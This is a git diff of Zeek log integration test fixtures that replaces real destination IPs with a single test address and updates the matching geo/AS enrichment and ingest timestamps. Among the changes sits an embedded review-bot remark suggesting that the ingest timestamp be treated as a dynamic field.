@@ -725,7 +737,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ol0Btm49e1mxnu/BXm1GM8w5ixY=", + "community_id": "1:61UpXAOHdoCqwl0IE7pv7Zrqgig=", "transport": "tcp" }, "@timestamp": "2019-01-17T06:36:59.757Z", @@ -735,7 +747,7 @@ "related": { "ip": [ "10.20.8.197", - "34.206.130.40" + "89.160.20.156" ] }, "host": { @@ -757,8 +769,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259624600Z", - "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"34.206.130.40\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", + "ingested": "2021-12-09T13:51:01.993457100Z", + "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "get", diff --git a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log index cbda884c9dc..c4b98af26dc 100644 --- a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log +++ b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log 
@@ -1,2 +1,2 @@
-{"ts":1573030980.989353,"uid":"Ctefoj1tgOPt4D0EK2","id.orig_h":"192.168.1.1","id.orig_p":37598,"id.resp_h":"198.41.0.4","id.resp_p":53,"seen.indicator":"198.41.0.4","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","seen.node":"worker-1-2","matched":["Intel::ADDR"],"sources":["ETPRO Rep: AbusedTLD Score: 127"]}
-{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"198.41.0.4\",\"id.resp_p\":53,\"seen.indicator\":\"198.41.0.4\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/intel.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
+{"ts":1573030980.989353,"uid":"Ctefoj1tgOPt4D0EK2","id.orig_h":"192.168.1.1","id.orig_p":37598,"id.resp_h":"89.160.20.156","id.resp_p":53,"seen.indicator":"89.160.20.156","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","seen.node":"worker-1-2","matched":["Intel::ADDR"],"sources":["ETPRO Rep: AbusedTLD Score: 127"]}
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: 
AbusedTLD Score: 127\"]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/intel.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json index 731a188e970..a51a678157a 100644 --- a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json +++ b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json @@ -8,28 +8,31 @@ "related": { "ip": [ "192.168.1.1", - "198.41.0.4" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 20172, + "number": 29518, "organization": { - "name": "VeriSign Global Registry Services" + "name": "Bredband2 AB" } }, - "address": "198.41.0.4", + "address": "89.160.20.156", "port": 53, - "ip": "198.41.0.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "Ctefoj1tgOPt4D0EK2", @@ -41,7 +44,7 @@ "Intel::ADDR" ], "seen": { - "indicator": "198.41.0.4", + "indicator": "89.160.20.156", "node": "worker-1-2", "indicator_type": "Intel::ADDR", "where": "Conn::IN_RESP" 
@@ -54,8 +57,8 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-08-11T19:18:29.535615500Z", - "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"198.41.0.4\",\"id.resp_p\":53,\"seen.indicator\":\"198.41.0.4\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", + "ingested": "2021-12-09T13:51:03.233040Z", + "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "enrichment", "id": "Ctefoj1tgOPt4D0EK2", @@ -78,23 +81,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 20172, + "number": 29518, "organization": { - "name": "VeriSign Global Registry Services" + "name": "Bredband2 AB" } }, - "address": "198.41.0.4", + "address": "89.160.20.156", "port": 53, - "ip": "198.41.0.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "Ctefoj1tgOPt4D0EK2", @@ -106,7 +112,7 @@ "Intel::ADDR" ], "seen": { - "indicator": "198.41.0.4", + "indicator": "89.160.20.156", "node": "worker-1-2", "indicator_type": "Intel::ADDR", "where": "Conn::IN_RESP" 
@@ -128,15 +134,15 @@ "related": { "ip": [ "192.168.1.1", - "198.41.0.4" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:29.535627700Z", - "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"198.41.0.4\",\"id.resp_p\":53,\"seen.indicator\":\"198.41.0.4\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", + "ingested": "2021-12-09T13:51:03.233049400Z", + "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "enrichment", "id": "Ctefoj1tgOPt4D0EK2", diff --git a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log index b5f66126945..6c07da778d0 100644 --- a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log +++ b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log 
@@ -1,4 +1,4 @@
-{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"command":"USER","value":"xxxxx","addl":"+iw xxxxx XxxxxxXxxx "}
-{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"user":"xxxxx","command":"NICK","value":"molochtest","addl":"+iw xxxxx XxxxxxXxxx "}
-{"ts":1387554250.706387,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"nick":"molochtest","user":"xxxxx","command":"JOIN","value":"#moloch-fpc","addl":" with channel key: \u0027-\u0027"}
-{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/irc.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
+{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"command":"USER","value":"xxxxx","addl":"+iw xxxxx XxxxxxXxxx "}
+{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"user":"xxxxx","command":"NICK","value":"molochtest","addl":"+iw xxxxx XxxxxxXxxx "}
+{"ts":1387554250.706387,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"nick":"molochtest","user":"xxxxx","command":"JOIN","value":"#moloch-fpc","addl":" with channel key: \u0027-\u0027"}
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/irc.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
diff --git a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json
index 2cead2372c7..21d6fe1ad5a 100644
--- a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json
+++ b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json
@@ -8,28 +8,31 @@ "related": { "ip": [ "10.180.156.249", - "38.229.70.20" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 23028, + "number": 29518, "organization": { - "name": "Team Cymru Inc." + "name": "Bredband2 AB" } }, - "address": "38.229.70.20", + "address": "89.160.20.156", "port": 8000, - "ip": "38.229.70.20" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CNJBX5FQdL62VUUP1", @@ -45,8 +48,8 @@ "ip": "10.180.156.249" }, "event": { - "ingested": "2021-08-11T19:18:29.946420700Z", - "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"command\":\"USER\",\"value\":\"xxxxx\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", + "ingested": "2021-12-09T13:51:03.580323700Z", + "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"command\":\"USER\",\"value\":\"xxxxx\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "USER", 
@@ -65,30 +68,33 @@ ], "network": { "protocol": "irc", - "community_id": "1:YdkGov/c+KLtmg7Cf5DLDB4+YdQ=", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", "transport": "tcp" } }, { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 23028, + "number": 29518, "organization": { - "name": "Team Cymru Inc." + "name": "Bredband2 AB" } }, - "address": "38.229.70.20", + "address": "89.160.20.156", "port": 8000, - "ip": "38.229.70.20" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CNJBX5FQdL62VUUP1", @@ -108,7 +114,7 @@ ], "network": { "protocol": "irc", - "community_id": "1:YdkGov/c+KLtmg7Cf5DLDB4+YdQ=", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", "transport": "tcp" }, "@timestamp": "2013-12-20T15:44:10.647Z", @@ -121,12 +127,12 @@ ], "ip": [ "10.180.156.249", - "38.229.70.20" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:29.946433800Z", - "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"user\":\"xxxxx\",\"command\":\"NICK\",\"value\":\"molochtest\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", + "ingested": "2021-12-09T13:51:03.580332Z", + "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"user\":\"xxxxx\",\"command\":\"NICK\",\"value\":\"molochtest\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "NICK", 
@@ -147,23 +153,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 23028, + "number": 29518, "organization": { - "name": "Team Cymru Inc." + "name": "Bredband2 AB" } }, - "address": "38.229.70.20", + "address": "89.160.20.156", "port": 8000, - "ip": "38.229.70.20" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CNJBX5FQdL62VUUP1", @@ -184,7 +193,7 @@ ], "network": { "protocol": "irc", - "community_id": "1:YdkGov/c+KLtmg7Cf5DLDB4+YdQ=", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", "transport": "tcp" }, "@timestamp": "2013-12-20T15:44:10.706Z", @@ -197,12 +206,12 @@ ], "ip": [ "10.180.156.249", - "38.229.70.20" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:29.946442200Z", - "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", + "ingested": "2021-12-09T13:51:03.580337700Z", + "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "JOIN", 
@@ -228,23 +237,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 23028, + "number": 29518, "organization": { - "name": "Team Cymru Inc." + "name": "Bredband2 AB" } }, - "address": "38.229.70.20", + "address": "89.160.20.156", "port": 8000, - "ip": "38.229.70.20" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CNJBX5FQdL62VUUP1", @@ -265,7 +277,7 @@ ], "network": { "protocol": "irc", - "community_id": "1:YdkGov/c+KLtmg7Cf5DLDB4+YdQ=", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", "transport": "tcp" }, "@timestamp": "2013-12-20T15:44:10.706Z", @@ -278,15 +290,15 @@ ], "ip": [ "10.180.156.249", - "38.229.70.20" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:29.946450300Z", - "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", + "ingested": "2021-12-09T13:51:03.580343100Z", + "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "JOIN", 
diff --git a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json index 98be875b679..c88fababaac 100644 --- a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json +++ b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json @@ -86,7 +86,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:30.597408600Z", + "ingested": "2021-12-09T13:51:04.150192Z", "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -201,7 +201,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:30.597421400Z", + "ingested": "2021-12-09T13:51:04.150196600Z", "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
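Review bot: Both hunks in this expected file change only the `event.ingested` timestamp that the test runner stamps on regeneration; the same holds for the modbus, mysql and ntlm expected files further down, none of which had any input or enrichment change. If the data stream's pipeline test config does not already declare it, marking the field dynamic, `dynamic_fields: {event.ingested: ".*"}`, would stop regenerations from churning unrelated fixtures and keep diffs like this PR limited to the geo/AS and address changes that actually need review. This is a suggestion about fixture hygiene rather than a defect in the generated content.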
diff --git a/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json b/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json index 137a3407a15..75a6af9f1ea 100644 --- a/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json +++ b/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json @@ -28,7 +28,7 @@ "ip": "192.168.1.10" }, "event": { - "ingested": "2021-08-11T19:18:31.350123900Z", + "ingested": "2021-12-09T13:51:04.835055300Z", "original": "{\"ts\":1352718265.222457,\"uid\":\"CpIIXl4DFGswmjH2bl\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":64342,\"id.resp_h\":\"192.168.1.164\",\"id.resp_p\":502,\"func\":\"READ_COILS\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -96,7 +96,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:31.350139100Z", + "ingested": "2021-12-09T13:51:04.835060100Z", "original": "{\"ts\":1352718265.222457,\"uid\":\"CpIIXl4DFGswmjH2bl\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":64342,\"id.resp_h\":\"192.168.1.164\",\"id.resp_p\":502,\"func\":\"READ_COILS\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json b/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json index ec10a8761ba..5c5b27bc714 100644 --- a/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json +++ b/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json 
@@ -30,7 +30,7 @@ "ip": "192.168.0.254" }, "event": { - "ingested": "2021-08-11T19:18:31.843442400Z", + "ingested": "2021-12-09T13:51:05.144926100Z", "original": "{\"ts\":1216281087.437392,\"uid\":\"C5Hol527kLMUw36hj3\",\"id.orig_h\":\"192.168.0.254\",\"id.orig_p\":56162,\"id.resp_h\":\"192.168.0.254\",\"id.resp_p\":3306,\"cmd\":\"query\",\"arg\":\"select count(*) from foo\",\"success\":true,\"rows\":1}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -102,7 +102,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:31.843456600Z", + "ingested": "2021-12-09T13:51:05.144933200Z", "original": "{\"ts\":1216281087.437392,\"uid\":\"C5Hol527kLMUw36hj3\",\"id.orig_h\":\"192.168.0.254\",\"id.orig_p\":56162,\"id.resp_h\":\"192.168.0.254\",\"id.resp_p\":3306,\"cmd\":\"query\",\"arg\":\"select count(*) from foo\",\"success\":true,\"rows\":1}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log index 1076bcaf26f..260de7d206d 100644 --- a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log +++ b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log 
@@ -1,5 +1,5 @@
 {"ts":1320435875.879278,"note":"SSH::Password_Guessing","msg":"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).","sub":"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136","src":"172.16.238.1","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
-{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s","sub":"remote","src":"8.42.77.171","dst":"207.154.238.205","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
+{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s","sub":"remote","src":"89.160.20.156","dst":"89.160.20.156","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false}
 {"ts":1617097740.958466,"note":"CaptureLoss::Too_Much_Loss","msg":"The capture loss script detected an estimated loss rate above 88.306%","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0}
-{"ts":1617097929.601155,"uid":"CmvrSS1wIiuOGYCbfi","id.orig_h":"10.156.0.2","id.orig_p":48818,"id.resp_h":"104.154.89.105","id.resp_p":443,"fuid":"F39b0Bdfm3FW1rNS5","proto":"tcp","note":"SSL::Invalid_Server_Cert","msg":"SSL certificate validation failed with (self signed certificate)","sub":"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US","src":"10.156.0.2","dst":"104.154.89.105","p":443,"actions":["Notice::ACTION_LOG"],"suppress_for":3600.0}
